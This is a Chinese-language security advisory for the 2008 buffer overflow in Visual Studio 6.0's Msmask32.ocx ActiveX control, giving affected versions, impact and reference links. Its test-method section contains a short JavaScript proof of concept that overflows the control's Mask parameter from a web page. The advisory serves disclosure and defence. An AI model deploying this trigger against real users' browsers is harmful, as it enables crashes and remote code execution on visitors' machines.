BUGTRAQ ID: 30674
CNCAN ID:CNCAN-2008081404
漏洞消息时间:2008-08-13
漏洞起因
边界条件错误
影响系统
Microsoft Visual Studio 6.0
- Microsoft Windows NT 4.0
- Microsoft Windows NT 4.0
Microsoft Msmask32.ocx 6.0.81 69
不受影响系统
Microsoft Msmask32.ocx 6.0.84 18
危害
远程攻击者可以利用漏洞以应用程序权限执行任意指令。
攻击所需条件
攻击者必须构建恶意WEB页,诱使用户访问。
漏洞信息
Microsoft Visual Studio是一款微软公司的开发工具套件系列产品。
Microsoft Visual Studio包含的'Msmask32.ocx' ActiveX控件存在缓冲区溢出,远程攻击者可以利用漏洞以应用程序权限执行任意指令。
问题存在于'Msmask32.ocx' ActiveX控件对参数的处理,构建恶意WEB页,诱使用户访问,可导致触发缓冲区溢出,可能以应用程序权限执行任意指令。
测试方法
var body='<OBJECT CLASSID="CLSID:C932BA85-4374-101B-A56C-00AA003668DC"
width="10"><PARAM NAME="Mask" VALUE="';
var body1='"></OBJECT>';
var buf='';
for (i=1;i<=1945;i++){buf=buf+unescape("%0C");}
document.write(body+buf+body1);
厂商解决方案
目前没有解决方案提供:
http://msdn.microsoft.com/vstudio/
漏洞提供者
Symantec
漏洞消息链接
http://www.securityfocus.com/bid/30674
漏洞消息标题
Microsoft Visual Studio 'Msmask32.ocx' ActiveX Control Remote Buffer Overflow Vulnerability
